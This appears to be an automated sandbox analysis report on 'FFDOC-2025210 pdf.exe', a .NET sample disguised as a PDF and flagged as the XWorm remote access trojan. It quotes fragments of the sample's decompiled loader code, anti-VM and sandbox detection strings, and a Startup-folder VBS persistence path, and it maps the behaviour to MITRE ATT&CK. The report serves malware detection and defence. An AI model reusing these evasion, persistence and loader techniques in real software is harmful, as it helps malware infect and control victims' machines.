              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeSection loaded: winsta.dllJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: FFDOC-2025210 pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: FFDOC-2025210 pdf.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: \??\C:\Windows\dll\System.pdb source: FFDOC-2025210 pdf.exe, 00000002.00000002.3310432392.0000000000E17000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: FFDOC-2025210 pdf.exe, 00000002.00000002.3310432392.0000000000E6F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: FFDOC-2025210 pdf.exe, 00000000.00000002.2211789511.0000000005960000.00000004.08000000.00040000.00000000.sdmp, FFDOC-2025210 pdf.exe, 00000000.00000002.2208202018.0000000003441000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.pdbC source: FFDOC-2025210 pdf.exe, 00000002.00000002.3310432392.0000000000E6F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: FFDOC-2025210 pdf.exe, 00000000.00000002.2211789511.0000000005960000.00000004.08000000.00040000.00000000.sdmp, FFDOC-2025210 pdf.exe, 00000000.00000002.2208202018.0000000003441000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: n,C:\Windows\System.pdb source: FFDOC-2025210 pdf.exe, 00000002.00000002.3310194259.00000000009E8000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256}Lq source: FFDOC-2025210 pdf.exe, 00000000.00000002.2211571183.0000000005900000.00000004.08000000.00040000.00000000.sdmp, FFDOC-2025210 pdf.exe, 00000000.00000002.2208202018.0000000003619000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\Desktop\FFDOC-2025210 pdf.PDB source: FFDOC-2025210 pdf.exe, 00000002.00000002.3310432392.0000000000E44000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdb source: FFDOC-2025210 pdf.exe, 00000000.00000002.2211571183.0000000005900000.00000004.08000000.00040000.00000000.sdmp, FFDOC-2025210 pdf.exe, 00000000.00000002.2208202018.0000000003619000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.pdb source: FFDOC-2025210 pdf.exe, 00000002.00000002.3310432392.0000000000E6F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: FFDOC-2025210 pdf.exe, 00000002.00000002.3310432392.0000000000E02000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ##.pdb source: FFDOC-2025210 pdf.exe, 00000002.00000002.3310194259.00000000009E8000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Desktop\FFDOC-2025210 pdf.PDB source: FFDOC-2025210 pdf.exe, 00000002.00000002.3310194259.00000000009E8000.00000004.00000010.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              .NET source code contains method to dynamically call methods (often used by packers)
              Source: 0.2.FFDOC-2025210 pdf.exe.25716e4.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.FFDOC-2025210 pdf.exe.25716e4.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.FFDOC-2025210 pdf.exe.25716e4.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
              .NET source code contains potential unpacker
              Source: FFDOC-2025210 pdf.exe, ActiveController.cs.Net Code: CheckAutomatedController System.AppDomain.Load(byte[])
              Source: 0.2.FFDOC-2025210 pdf.exe.5960000.12.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 0.2.FFDOC-2025210 pdf.exe.5960000.12.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 0.2.FFDOC-2025210 pdf.exe.5960000.12.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
              Source: 0.2.FFDOC-2025210 pdf.exe.25716e4.0.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
              Source: 0.2.FFDOC-2025210 pdf.exe.25716e4.0.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
              Source: 0.2.FFDOC-2025210 pdf.exe.25716e4.0.raw.unpack, Messages.cs.Net Code: Memory
              Source: 0.2.FFDOC-2025210 pdf.exe.348fd10.2.raw.unpack, ActiveController.cs.Net Code: CheckAutomatedController System.AppDomain.Load(byte[])
              Yara detected Costura Assembly Loader
              Source: Yara matchFile source: 0.2.FFDOC-2025210 pdf.exe.5710000.10.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.FFDOC-2025210 pdf.exe.5710000.10.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.2211197275.0000000005710000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2192389813.00000000024CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: FFDOC-2025210 pdf.exe PID: 2276, type: MEMORYSTR
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeFile created: C:\Users\user\AppData\Roaming\Current.exeJump to dropped file

              Boot Survival

              barindex
              Drops VBS files to the startup folder
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Current.vbsJump to dropped file
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Current.vbsJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Current.vbsJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Yara detected AntiVM3
              Source: Yara matchFile source: Process Memory Space: FFDOC-2025210 pdf.exe PID: 2276, type: MEMORYSTR
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
              Source: FFDOC-2025210 pdf.exe, 00000000.00000002.2192389813.00000000024CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeMemory allocated: 870000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeMemory allocated: 2430000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeMemory allocated: 4430000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeMemory allocated: F80000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeMemory allocated: 2B30000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeMemory allocated: 4B30000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: FFDOC-2025210 pdf.exe, 00000000.00000002.2192389813.00000000024CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen
              Source: FFDOC-2025210 pdf.exe, 00000000.00000002.2192389813.00000000024CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
              Source: FFDOC-2025210 pdf.exe, 00000000.00000002.2191921291.00000000008F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              .NET source code references suspicious native API functions
              Source: 0.2.FFDOC-2025210 pdf.exe.5960000.12.raw.unpack, NativeMethods.csReference to suspicious API methods: OpenProcessToken(hProcess, desiredAccess, out var TokenHandle)
              Source: 0.2.FFDOC-2025210 pdf.exe.5960000.12.raw.unpack, ResourceReferenceValue.csReference to suspicious API methods: NativeMethods.LoadLibrary(ResourceFilePath)
              Source: 0.2.FFDOC-2025210 pdf.exe.25716e4.0.raw.unpack, Messages.csReference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess created: C:\Users\user\Desktop\FFDOC-2025210 pdf.exe "C:\Users\user\Desktop\FFDOC-2025210 pdf.exe"Jump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeQueries volume information: C:\Users\user\Desktop\FFDOC-2025210 pdf.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeQueries volume information: C:\Users\user\Desktop\FFDOC-2025210 pdf.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected XWorm
              Source: Yara matchFile source: 2.2.FFDOC-2025210 pdf.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.FFDOC-2025210 pdf.exe.25716e4.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.FFDOC-2025210 pdf.exe.25716e4.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.3310045427.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2192389813.0000000002732000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2192389813.00000000024CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: FFDOC-2025210 pdf.exe PID: 2276, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: FFDOC-2025210 pdf.exe PID: 6484, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected XWorm
              Source: Yara matchFile source: 2.2.FFDOC-2025210 pdf.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.FFDOC-2025210 pdf.exe.25716e4.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.FFDOC-2025210 pdf.exe.25716e4.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.3310045427.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2192389813.0000000002732000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2192389813.00000000024CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: FFDOC-2025210 pdf.exe PID: 2276, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: FFDOC-2025210 pdf.exe PID: 6484, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information1
              Scripting              		Valid Accounts1
              Scheduled Task/Job              		1
              Scripting              		11
              Process Injection              		1
              Masquerading              		OS Credential Dumping211
              Security Software Discovery              		Remote Services11
              Archive Collected Data              		1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Native API              		1
              Scheduled Task/Job              		1
              Scheduled Task/Job              		2
              Virtualization/Sandbox Evasion              		LSASS Memory2
              Virtualization/Sandbox Evasion              		Remote Desktop ProtocolData from Removable Media1
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAt2
              Registry Run Keys / Startup Folder              		2
              Registry Run Keys / Startup Folder              		1
              Disable or Modify Tools              		Security Account Manager1
              Process Discovery              		SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCron1
              DLL Side-Loading              		1
              DLL Side-Loading              		11
              Process Injection              		NTDS13
              System Information Discovery              		Distributed Component Object ModelInput Capture12
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
              Software Packing              		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              FFDOC-2025210 pdf.exe32%VirustotalBrowse
              FFDOC-2025210 pdf.exe32%ReversingLabs

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\Current.exe32%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

